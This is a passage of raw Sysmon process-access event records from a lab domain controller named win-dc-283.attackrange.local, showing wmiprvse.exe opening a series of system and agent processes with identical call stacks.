15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 